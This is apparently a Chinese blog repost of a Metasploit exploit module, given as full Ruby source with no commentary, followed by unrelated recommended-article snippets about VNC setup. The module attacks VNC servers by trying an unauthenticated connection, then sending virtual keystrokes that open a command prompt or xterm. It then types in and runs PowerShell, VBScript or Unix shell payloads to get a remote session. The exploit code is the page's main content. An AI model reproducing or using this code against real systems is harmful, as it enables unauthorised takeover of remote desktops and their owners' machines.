VNC Keyboard Remote Code Execution

最新推荐文章于 2021-07-13 14:11:38 发布
最新推荐文章于 2021-07-13 14:11:38 发布
阅读量783 收藏
点赞数
文章标签: metasploit 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/proto/rfb'

class Metasploit3 < Msf::Exploit::Remote

  Rank = GreatRanking
  WINDOWS_KEY = "\xff\xeb"
  ENTER_KEY = "\xff\x0d"

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'VNC Keyboard Remote Code Execution',
      'Description'     => %q{
        This module exploits VNC servers by sending virtual keyboard keys and executing
        a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager
        payload is typed and executed. On Unix/Linux systems a xterm terminal is opened
        and a payload is typed and executed.
      },
      'Author'          => [ 'xistence <xistence[at]0x90.nl>' ],
      'Privileged'      => false,
      'License'         => MSF_LICENSE,
      'Platform'       => %w{ win unix },
      'Targets'         =>
        [
          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],
          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
        ],
      'DisclosureDate'  => 'Jul 10 2015',
      'DefaultTarget'   => 0))

    register_options(
      [
        Opt::RPORT(5900),
        OptString.new('PASSWORD', [ false, 'The VNC password']),
        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
      ], self.class)
  end


  def press_key(key)
    keyboard_key = "\x04\x01" # Press key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end


  def release_key(key)
    keyboard_key = "\x04\x00" # Release key
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data
    keyboard_key << key # The keyboard key
    # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream
    sock.put(keyboard_key)
  end


  def exec_command(command)
    values = command.chars.to_a
    values.each do |value|
      press_key("\x00#{value}")
      release_key("\x00#{value}")
    end
    press_key(ENTER_KEY)
  end


  def start_cmd_prompt
    print_status("#{rhost}:#{rport} - Opening Run command")
    # Pressing and holding windows key for 1 second
    press_key(WINDOWS_KEY)
    Rex.select(nil, nil, nil, 1)
    # Press the "r" key
    press_key("\x00r")
    # Now we can release both keys again
    release_key("\x00r")
    release_key(WINDOWS_KEY)
    # Wait a second to open run command window
    select(nil, nil, nil, 1)
    exec_command('cmd.exe')
    # Wait a second for cmd.exe prompt to open
    Rex.select(nil, nil, nil, 1)
  end


  def exploit

    begin
      alt_key = "\xff\xe9"
      f2_key = "\xff\xbf"
      password = datastore['PASSWORD']

      connect
      vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)

      unless vnc.handshake
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")
      end

      if password.nil?
        print_status("#{rhost}:#{rport} - Bypass authentication")
        # The following byte is sent in case the VNC server end doesn't require authentication (empty password)
        sock.put("\x10")
      else
        print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")
        if vnc.authenticate(password)
          print_status("#{rhost}:#{rport} - Authenticated")
        else
          fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")
        end
      end

      # Send shared desktop
      unless vnc.send_client_init
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")
      end

      if target.name =~ /VBScript CMDStager/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        execute_cmdstager({:flavor => :vbs, :linemax => 8100})
        # Exit the CMD prompt
        exec_command('exit')
      elsif target.name =~ /Powershell/
        start_cmd_prompt
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encode_final_payload: true})
        # Execute powershell payload and make sure we exit our CMD prompt
        exec_command("#{command} && exit")
      elsif target.name =~ /Linux/
        print_status("#{rhost}:#{rport} - Opening 'Run Application'")
        # Press the ALT key and hold it for a second
        press_key(alt_key)
        Rex.select(nil, nil, nil, 1)
        # Press F2 to start up "Run application"
        press_key(f2_key)
        # Release ALT + F2
        release_key(alt_key)
        release_key(f2_key)
        # Wait a second for "Run application" to start
        Rex.select(nil, nil, nil, 1)
        # Start a xterm window
        print_status("#{rhost}:#{rport} - Opening xterm")
        exec_command('xterm')
        # Wait a second for "xterm" to start
        Rex.select(nil, nil, nil, 1)
        # Execute our payload and exit (close) the xterm window
        print_status("#{rhost}:#{rport} - Typing and executing payload")
        exec_command("nohup #{payload.encoded} &")
        exec_command('exit')
      end

      print_status("#{rhost}:#{rport} - Waiting for session...")
      (datastore['TIME_WAIT']).times do
        Rex.sleep(1)

        # Success! session is here!
        break if session_created?
      end

    rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
    ensure
      disconnect
    end
  end

  def execute_command(cmd, opts = {})
    exec_command(cmd)
  end

end
7禧
关注
解决VNC有些键不能输入的问题
I am Peter Chen
03-07 1万+
今天ubuntu 12.04中安装了vnc server 不知咋搞的就没法输入p 之前安装也遇到不能输入d的事情 先看keyboard里的shortcuts,没有和p相关的 再看compizconfig也没有 sudo apt-get install compizconfig-settings-manager General -> General Options -> Key bind
如何在Ubuntu 20.04上安装和配置VNC
08-17 8335
介绍 (Introduction) Virtual Network Computing, or VNC, is a connection system that allows you to use your keyboard and mouse to interact with a graphical desktop environment on a remote server. It make...
Metasploit 魔鬼训练营》01 初识 Metasploit
kevinhanser
08-23 1638
1 . 使用 msf 图形化工具 armitage从 armitage 2 . 使用 msfconsole 控制台利用 samba 漏洞获取控制权 3 . 使用 msfconsole 控制台利用 VNC 漏洞获取控制权 4 . 总结过程
Keyboard Mapping Problem on Tight VNC
weixin_30455067的博客
04-26 279
VNCviewer(xtightviewer) 登录 VNCServer(xtightcvncserver) 也不能正常工作,键盘映射是错误的,输入‘s',输出一个’e‘。xtight 自己的vncserver 和vncviewer 都能工作。 一个临时的解决办法是: <!--[endif]--> export XKL_XMODMAP_DISABL...
RH Linux配置VNCServer
Keyboard Knight
11-19 150
使用vncserver命令为当前用户启动vnc服务(将在当前用户主目录下生成.vnc配置文件夹)[root@tech ~]# vi .vnc/xstartup gnome-session &amp;   关闭服务器上自己的vnc连接vncserver -kill  :桌面号例如:关闭上面的vnc连接vncserver -kill  :1开机自动运行vncserver1.设置vncserver...
解除VNC的键盘禁用
无知是恶
08-29 7893
解除VNC的键盘禁用: 我们上课老师用的VNC,但是我发现alt+tab用不了不能切换后台很不方便,在网上找了好久也没解决办法,最后自己捣鼓出来了,具体步骤: 在空白处点击右键——&gt;options——&gt;advanced——&gt;input——&gt;pass special keys勾掉,然后就行了哈哈...
VNC Protocol Analysis: Principles and Mechanisms of Remote Desktop Communication
Remote desktop communication refers to the process of accessing and controlling the desktop interface of another computer over a network from a remote location, enabling functions such as remote ...
Troubleshooting VNC Connection Issues: Common Fault Diagnosis and Solutions
VNC (Virtual Network Computing) is a type of remote desktop control software that allows users to remotely control and transfer files between different computers. Below we will introduce the basic ...
Guide to Remote Desktop Connection in MobaXterm
# Guide to Remote Desktop Connection in MobaXterm ## Introduction - ### What is MobaXterm MobaXterm is a powerful terminal tool that integrates various remote connection protocols and utilities, ...
Orange's动手写操作系统-----------第一篇:nasm,bochs环境配置(学习笔记1)
[每一个你讨厌的现在,都有一个不够努力的曾经_...._]
11-17 3914
找完工作,开始学习orange's自己动手写操作系统,希望能够坚持,现在的目标就是好好学习,加油~~~ 1:安装nasm汇编编译器:网站下载:http://sourceforge.net/projects/nasm,目前最新版本是,nasm-2.06.tar.gz     源码安装:     ~$./configure     ~$make     ~$sudo make install
Qt: XKEYBOARD extension not present on the X server.的解决方法
bianxuewei1238的博客
10-30 1万+
最近在服务器上用qtcreator改代码,发现无法用键盘键入任何东西,然后发现在终端会报出这样一行东西: Qt: XKEYBOARD extension not present on the X server. 查了很多东西,发现这就是问题所在。 至于怎么改,有说要改.bashrc的,具体需要添加以下两行代码: export XKB_DEFAULT_RULES=base export ...
VNC连接成功黑屏的原因深究
热门推荐
sinat_34780035的博客
01-19 2万+
新弄了一个服务器,安装各种服务,装VNC遇到问题,黑屏,百度之,网上流传的大部分是基于gnome的桌面配置的,如http://blog.csdn.net/lymemoryzz/article/details/50669566除了VNC出现问题,还可以考虑dao是gnome等linux桌面的问题,当时我查看oracle linux默认是有gnome于是直接按这个配置,结果一直没好,然后从头安装配置s
通过 RDP、SSH、VNC 进行远程控制
keyboard专栏
07-13 2448
VNC VNC(Virtual Network Computing )是一种图形化的桌面共享系统,它使用远程帧缓冲协议 (RFB) 来远程控制另一台计算机。它将键盘和鼠标事件从一台计算机传输到另一台计算机,通过网络向另一个方向转发图形屏幕更新。 优点: 1、VNC是平台无关的—— 有多种客户端和服务器的实现,几乎涵盖了所有的主流平台。甚至一些VNC的实现被称“无客户端”,这是因为不需要安装插件或客户端软件而,而是依靠HTML5技术,只需要一个浏览器就可以访问远程桌面了。 2、VNC 是开源的—— VNC最初
vnc 键盘慢_在基于Web的VNC应用程序中支持多种键盘布局
cuyi7076的博客
06-22 798
诸如Kimchi和Ovirt之类的基于Web的KVM管理工具可帮助用户轻松创建和管理虚拟机(VM),甚至可以从移动设备进行管理。 此类工具依赖于虚拟桌面计算 (VNC)等远程桌面共享技术,而使用VNC的工具则需要基于Web的VNC客户端,例如noVNCVNC的最初目标是使物理PC可以远程访问。 因为虚拟化不是VNC的问题,所以将VNC与VM一起使用时,对键击的解释和操作需要特殊处理。...
汇编语言详细介绍.txt
09-24
汇编语言详细介绍.txt
adb安装工具包及指导
09-24
linux/嵌入式软件开发工具—adb
python1Python脚本 模拟登录知乎, 爬虫,操作excel,微信公众号,远程开机PGL.zip
09-24
[python1]Python脚本。模拟登录知乎, 爬虫,操作excel,微信公众号,远程开机【PGL】.zip [python1]Python脚本。模拟登录知乎, 爬虫,操作excel,微信公众号,远程开机【PGL】.zip [python1]Python脚本。模拟登录知乎, 爬虫,操作excel,微信公众号,远程开机【PGL】.zip
为自动脚本量身定做的状态机!像多线程那样去轮询多个状态,不同的状态满足后去执行不同的定时任务。.zip
最新发布
09-24
为自动脚本量身定做的状态机!像多线程那样去轮询多个状态,不同的状态满足后去执行不同的定时任务。
vnc viewer - remote desktop apk
11-05
VNC Viewer - Remote Desktop APK 是一款功能强大的远程桌面应用程序。它允许用户通过安卓设备远程访问和控制其他计算机的桌面界面。这款应用程序基于VNC(Virtual Network Computing)技术,通过网络连接将用户的设备与目标计算机进行沟通。 使用 VNC Viewer - Remote Desktop APK,用户可以在任何地方轻松访问他们的计算机。无论是在家、在办公室还是在旅途中,只需通过安卓设备连接到网络,即可直接进入远程计算机的桌面界面。这对于需要远程工作、处理文件、访问个人文件或远程支持他人的人来说非常方便。 除了远程访问,VNC Viewer - Remote Desktop APK 还具有许多实用的功能。用户可以通过触摸屏幕进行鼠标和键盘输入,完全模拟物理输入设备。此外,用户还可以实时查看和控制远程计算机的屏幕,交流和操作变得非常直观和效率。 该应用程序支持高级的安全加密机制,使用户可以安全地连接到远程计算机,确保数据传输的保密性和完整性。此外,VNC Viewer - Remote Desktop APK 还可以根据用户的网络情况进行调整,以优化连接速度和性能。 总的来说,VNC Viewer - Remote Desktop APK 是一款方便实用的远程桌面应用程序。它为用户提供了灵活的远程访问和控制选项,并具有高级的安全性和性能优化功能。无论是个人使用还是商业用途,这款应用程序都能为用户提供便利和效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值